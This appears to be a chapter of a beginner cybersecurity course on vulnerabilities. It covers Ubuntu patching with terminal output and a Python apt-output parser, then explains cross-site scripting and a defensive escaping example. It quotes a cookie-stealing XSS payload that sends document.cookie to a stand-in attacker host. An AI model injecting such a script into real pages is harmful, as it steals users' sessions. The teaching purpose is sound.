7 Vulnerabilities and Risks
7.1 Types of Vulnerabilities
7.1.1 Unpatched Software
A software patch is like a tiny piece of fabric used to repair a hole in your clothes. It’s a small fix to a problem. In the same way, a software patch is a small improvement or fix for a computer program. It helps keep your software running smoothly and securely.
If you don’t apply these patches, it’s like leaving a hole in your clothes. Bad things can happen, like getting cold or dirty. Similarly, if you don’t update your software with patches, it can leave your computer vulnerable to hackers who can steal your information or damage your computer.
7.1.2 Upgrade Notification When You Login
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.8.0-39-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sun Aug 4 22:00:53 UTC 2024
System load: 0.0 Processes: 100
Usage of /: 26.2% of 8.65GB Users logged in: 1
Memory usage: 41% IPv4 address for eth0: 64.23.172.30
Swap usage: 0% IPv4 address for eth0: 10.48.0.5
Expanded Security Maintenance for Applications is not enabled.
5 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Last login: Sun Aug 4 21:55:15 2024 from 198.211.111.194
root@cyber24:~#
7.1.2.1 Software Status and Upgrade
Update Package List:
root@cyber24:~# apt update
Hit:1 http://mirrors.digitalocean.com/ubuntu noble InRelease
Get:2 http://mirrors.digitalocean.com/ubuntu noble-updates InRelease [126 kB]
Hit:3 http://mirrors.digitalocean.com/ubuntu noble-backports InRelease
Hit:4 https://repos-droplet.digitalocean.com/apt/droplet-agent main InRelease
Hit:5 https://repos.insights.digitalocean.com/apt/do-agent main InRelease
Get:6 http://security.ubuntu.com/ubuntu noble-security InRelease [126 kB]
Get:7 http://mirrors.digitalocean.com/ubuntu noble-updates/main amd64 Packages [305 kB]
Get:8 http://mirrors.digitalocean.com/ubuntu noble-updates/main Translation-en [78.7 kB]
Get:9 http://mirrors.digitalocean.com/ubuntu noble-updates/universe amd64 Packages [310 kB]
Get:10 http://mirrors.digitalocean.com/ubuntu noble-updates/universe Translation-en [130 kB]
Get:11 http://security.ubuntu.com/ubuntu noble-security/main amd64 Packages [259 kB]
Get:12 http://security.ubuntu.com/ubuntu noble-security/universe amd64 Packages [243 kB]
Fetched 1577 kB in 4s (353 kB/s)
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
7 packages can be upgraded. Run 'apt list --upgradable' to see them.
List Upgradable Packages:
root@cyber24:~# apt list --upgradeable
Listing... Done
dracut-install/noble-updates 060+5-1ubuntu3.2 amd64 [upgradable from: 060+5-1ubuntu3.1]
libopeniscsiusr/noble-updates 2.1.9-3ubuntu5.1 amd64 [upgradable from: 2.1.9-3ubuntu4]
libssl3t64/noble-security 3.0.13-0ubuntu3.2 amd64 [upgradable from: 3.0.13-0ubuntu3.1]
needrestart/noble-updates 3.6-7ubuntu4.1 all [upgradable from: 3.6-7ubuntu4]
open-iscsi/noble-updates 2.1.9-3ubuntu5.1 amd64 [upgradable from: 2.1.9-3ubuntu4]
openssl/noble-security 3.0.13-0ubuntu3.2 amd64 [upgradable from: 3.0.13-0ubuntu3.1]
thin-provisioning-tools/noble-updates 0.9.0-2ubuntu5.1 amd64 [upgradable from: 0.9.0-2ubuntu5]
Check Installed Packages with Known Vulnerabilities:
root@cyber24:~# ubuntu-security-status --current
This command has been replaced with 'pro security-status'.
673 packages installed:
668 packages from Ubuntu Main/Restricted repository
2 packages from Ubuntu Universe/Multiverse repository
3 packages from third parties
To get more information about the packages, run
pro security-status --help
for a list of available options.
Upgrade All Packages:
root@cyber24:~# apt-get upgrade
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
The following upgrades have been deferred due to phasing:
dracut-install libopeniscsiusr needrestart open-iscsi thin-provisioning-tools
The following packages will be upgraded:
libssl3t64 openssl
2 upgraded, 0 newly installed, 0 to remove and 5 not upgraded.
Need to get 2942 kB of archives.
After this operation, 1024 B of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://security.ubuntu.com/ubuntu noble-security/main amd64 libssl3t64 amd64 3.0.13-0ubuntu3.2 [1940 kB]
Get:2 http://security.ubuntu.com/ubuntu noble-security/main amd64 openssl amd64 3.0.13-0ubuntu3.2 [1002 kB]
Fetched 2942 kB in 8s (389 kB/s)
(Reading database ... 103540 files and directories currently installed.)
Preparing to unpack .../libssl3t64_3.0.13-0ubuntu3.2_amd64.deb ...
Unpacking libssl3t64:amd64 (3.0.13-0ubuntu3.2) over (3.0.13-0ubuntu3.1) ...
Setting up libssl3t64:amd64 (3.0.13-0ubuntu3.2) ...
(Reading database ... 103540 files and directories currently installed.)
Preparing to unpack .../openssl_3.0.13-0ubuntu3.2_amd64.deb ...
Unpacking openssl (3.0.13-0ubuntu3.2) over (3.0.13-0ubuntu3.1) ...
Setting up openssl (3.0.13-0ubuntu3.2) ...
Processing triggers for man-db (2.12.0-4build2) ...
Processing triggers for libc-bin (2.39-0ubuntu8.2) ...
Scanning processes...
Scanning candidates...
Scanning linux images...
Running kernel seems to be up-to-date.
Restarting services...
/etc/needrestart/restart.d/systemd-manager
systemctl restart ssh.service systemd-journald.service systemd-networkd.service systemd-resolved.service systemd-timesyncd.service systemd-udevd.service udisks2.service
Service restarts being deferred:
systemctl restart systemd-logind.service
No containers need to be restarted.
User sessions running outdated binaries:
jeremy @ session #264: sshd[25823]
jeremy @ user manager service: systemd[25827]
root @ user manager service: systemd[25692]
No VM guests are running outdated hypervisor (qemu) binaries on this host.
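Install Security Updates Only (this assumes /etc/apt/security.sources.list has already been created and lists only the security repository; the file does not exist by default, and sources under /etc/apt/sources.list.d/ are still read unless Dir::Etc::SourceParts is overridden as well):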
sudo apt-get upgrade -o Dir::Etc::SourceList=/etc/apt/security.sources.list
Or upgrade automatically
sudo apt-get install unattended-upgrades
sudo unattended-upgrade
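To triage pending updates before upgrading, the following added example (not part of the original notes) parses the `apt list --upgradable` listing shown above and separates packages offered from a `-security` suite from the rest. The function names are hypothetical, and SAMPLE is constructed from the listing on this page.

```python
import re

# Constructed sample: the `apt list --upgradable` output shown on this page.
SAMPLE = """\
Listing... Done
dracut-install/noble-updates 060+5-1ubuntu3.2 amd64 [upgradable from: 060+5-1ubuntu3.1]
libopeniscsiusr/noble-updates 2.1.9-3ubuntu5.1 amd64 [upgradable from: 2.1.9-3ubuntu4]
libssl3t64/noble-security 3.0.13-0ubuntu3.2 amd64 [upgradable from: 3.0.13-0ubuntu3.1]
needrestart/noble-updates 3.6-7ubuntu4.1 all [upgradable from: 3.6-7ubuntu4]
open-iscsi/noble-updates 2.1.9-3ubuntu5.1 amd64 [upgradable from: 2.1.9-3ubuntu4]
openssl/noble-security 3.0.13-0ubuntu3.2 amd64 [upgradable from: 3.0.13-0ubuntu3.1]
thin-provisioning-tools/noble-updates 0.9.0-2ubuntu5.1 amd64 [upgradable from: 0.9.0-2ubuntu5]
"""

# Line shape: name/suite[,suite...] new-version arch [upgradable from: old-version]
LINE_RE = re.compile(
    r"^(?P<name>[^/\s]+)/(?P<suites>\S+)\s+(?P<new>\S+)\s+(?P<arch>\S+)\s+"
    r"\[upgradable from: (?P<old>[^\]]+)\]$"
)

def parse_upgradable(text):
    """Return one dict per upgradable package; banner and warning lines are skipped."""
    packages = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        pkg = match.groupdict()
        pkg["suites"] = pkg["suites"].split(",")  # a package can be listed in several suites
        pkg["security"] = any(s.endswith("-security") for s in pkg["suites"])
        packages.append(pkg)
    return packages

def triage(text):
    """Split pending upgrades into (security-suite names, other names)."""
    packages = parse_upgradable(text)
    security = sorted(p["name"] for p in packages if p["security"])
    other = sorted(p["name"] for p in packages if not p["security"])
    return security, other

if __name__ == "__main__":
    security, other = triage(SAMPLE)
    print("security suite:", ", ".join(security) or "none")
    print("other updates: ", ", ".join(other) or "none")
```

When piping live output into the parser, note that apt prints a warning that its command-line interface is not stable for scripts; the parser ignores that line because it does not match the package pattern.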
Summary
To ensure your Ubuntu 24.04 LTS system is secure and up-to-date, use pro security-status (the replacement for ubuntu-security-status) to get a summary of security updates, regularly check for updates with apt, use Canonical Livepatch for kernel updates, subscribe to security notifications, and use tools like Canonical Landscape for managing multiple systems. Regularly applying security updates and staying informed about vulnerabilities are key to maintaining a secure system.
The sudo command in Ubuntu 24.04 allows users to execute commands with administrative privileges temporarily, which is necessary for performing system tasks like updates. It enhances security by restricting root access to specific commands, thereby preventing accidental system-wide changes. For example, updating the system involves running sudo apt update to refresh the package list and sudo apt upgrade to install available updates. Using sudo ensures that these commands have the necessary permissions while logging the actions for accountability.
The superuser (root) must add a user to the sudo group before that user can run sudo: usermod -aG sudo username
7.1.3 Understanding XSS (Cross-Site Scripting)
7.1.3.1 What is XSS?
XSS stands for Cross-Site Scripting. It is a type of security vulnerability found in web applications that allows attackers to inject malicious scripts into web pages viewed by other users. These scripts can execute in the user’s browser, leading to harmful actions such as stealing sensitive information or altering the website’s content.
7.1.3.2 How XSS Works
Injecting Malicious Scripts: Attackers exploit vulnerabilities in a web application to inject malicious scripts, often through input fields or URLs.
Executing Scripts in the Browser: When users visit the compromised web page, the malicious scripts run in their browsers.
Causing Harm: These scripts can perform actions like stealing cookies or session tokens, redirecting users to phishing sites, or modifying web content.
7.1.3.3 Types of XSS
There are three main types of XSS attacks:
- Stored XSS (Persistent XSS):
  - Description: The malicious script is stored on the server (e.g., in a database) and is served to users whenever they request the affected page.
  - Example: An attacker submits a comment with a malicious script on a forum. Whenever a user views the comment, the script runs in their browser.
- Reflected XSS (Non-Persistent XSS):
  - Description: The malicious script is reflected off a web server, typically through URL parameters. It is executed immediately without being stored.
  - Example: An attacker crafts a URL containing a script and tricks users into clicking it. The script runs when the server processes the URL and reflects the input back to the user.
- DOM-based XSS:
  - Description: The malicious script is executed by modifying the Document Object Model (DOM) of the page directly in the user’s browser, without involving the server.
  - Example: An attacker manipulates the URL hash or other client-side input to execute scripts within the browser’s context.
7.1.3.4 Real-Life Example of XSS
Imagine a popular social media platform where users can post comments on each other’s profiles. The platform has a vulnerability that allows attackers to inject scripts into comment sections because it doesn’t properly validate or sanitise user inputs.
How the Attack Occurs
Attacker Identifies the Vulnerability: A malicious user discovers that they can inject JavaScript code into the comment section of the social media site.
Injecting Malicious Script: The attacker crafts a comment containing a script that looks harmless at first glance:
<script> document.location='http://malicious-site.com/steal?cookie='+document.cookie </script>
This script captures the cookies of anyone who views the comment and sends them to a server controlled by the attacker.
Posting the Comment: The attacker posts this comment on the profile of a high-profile user, knowing it will be viewed by many others.
Users View the Compromised Page: When other users visit the profile and the malicious comment loads, the script executes in their browsers.
Stealing Session Cookies: The script sends their session cookies to the attacker’s server. With these cookies, the attacker can impersonate users and access their accounts without knowing their passwords.
7.1.3.5 Impact of XSS Attacks
7.1.3.6 Impact
- Account Hijacking: The attacker can access and manipulate user accounts, post unauthorized content, or steal personal information.
- Spread of Malicious Content: The attacker could use the compromised accounts to spread more malicious links, amplifying the attack’s reach.
- Trust Damage: Users lose trust in the platform’s security, affecting its reputation and user base.
7.1.3.7 Preventing XSS
To protect web applications from XSS attacks, developers should:
- Validate and Sanitize Inputs: Ensure all user inputs are checked for harmful characters and remove or escape them.
- Encode Output: Safely encode data before displaying it in the browser to prevent execution of injected scripts.
- Use Security Libraries: Utilize frameworks and libraries that offer built-in protection against XSS.
- Implement Content Security Policy (CSP): Set up a CSP to control which scripts can run on your site.
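Output encoding and a CSP header from the list above, as an added example that is not part of the original notes: a comment renderer that concatenates input unchanged next to one that encodes it, with an HTML parser confirming which output still contains a script element. The function names and the policy string are hypothetical; the input is the comment payload quoted earlier on this page.

```python
import html
from html.parser import HTMLParser

# Constructed input: the comment payload quoted earlier on this page.
PAYLOAD = ("<script> document.location='http://malicious-site.com/steal?cookie='"
           "+document.cookie </script>")

# Hypothetical policy: scripts load only from the site's own origin, so an
# inline <script> block that slips through is refused by the browser.
CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"

def render_comment_unsafe(author, body):
    """Vulnerable: user input is concatenated into the markup unchanged."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'

def render_comment_safe(author, body):
    """Hardened: encode <, >, &, and both quote characters at output time."""
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')

class _TagCollector(HTMLParser):
    """Records every element start tag the parser sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    """Return the element names a parser finds in the rendered markup."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def response_headers():
    """Headers to send with the page; CSP is a second layer, not a substitute for encoding."""
    return {"Content-Type": "text/html; charset=utf-8",
            "Content-Security-Policy": CSP}

if __name__ == "__main__":
    print("unsafe:", tags_in(render_comment_unsafe("visitor", PAYLOAD)))
    print("safe:  ", tags_in(render_comment_safe("visitor", PAYLOAD)))
    print(response_headers()["Content-Security-Policy"])
```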
7.1.3.8 Conclusion
XSS is a serious vulnerability that can have damaging effects on both users and websites. By understanding how XSS attacks work and applying security best practices, developers can protect their applications and users from these threats.